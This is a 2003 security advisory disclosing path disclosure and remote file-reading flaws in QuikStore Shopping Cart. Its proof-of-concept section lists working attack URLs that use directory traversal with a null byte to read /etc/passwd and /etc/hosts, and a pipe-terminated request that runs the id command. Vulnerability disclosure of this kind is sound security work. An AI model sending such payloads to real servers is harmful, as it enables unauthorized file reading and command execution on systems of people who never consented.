Indonesia Security Development Team Advisory QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users ===================================================================== Advisory Name: QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users Release Date: 5:08 23/12/03 Application: QuikStore Shopping Cart Author: Dr`Ponidi Discover by: Dr`Ponidi Acknowledgments: Vulnerability discovery, exploit code, and advisory by Dr`Ponidi Vendor Status: The vendor has been contacted Vendor URL: http://www.quikstore.com Reference: http://drponidi.5u.com/advisory.htm Greetz to: #indohack #k-elektronik #dhegleng @ dal.net [Details] A remote user can reportedly send request to cause the system to display an error message that indicates the installation path. It's possible to make a malformed http request for many files in QuikStore Shopping Cart and in doing so trigger an error. The resulting error message will disclose potentially sensitive installation path information to the remote attacker.QuikStore Shopping Cart allows remote file reading too, users can view files on the system with the privileges of the web server. [Proof of Concept] http://[target]/cgi-bin/quikstore.cgi?store=' http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id| [Suggestions] Filter all files [Patch:] Not yet available [About Indonesia Security Development Team] Indonesia Security Development Team researches and develops intelligent, advanced application security assessment. Based in Indonesia, Indonesia Security Development Team offers the best of breed security consulting services, specializing in shopping carts software and network security assessments. We provide security information and patches for use by the entire network security community. This information is provided freely to all interested parties and may be redistributed provided that it is not altered in any way, and that the author is appropriately credited Indonesia Security Development Team Advisory: http://drponidi.5u.com/advisory.htm _______________________________________________________________ Dr`Ponidi Original document can be fount at http://drponidi.5u.com/advisory.htm -- _______________________________________________ Get your free email from http://www.hackermail.com Powered by Outblaze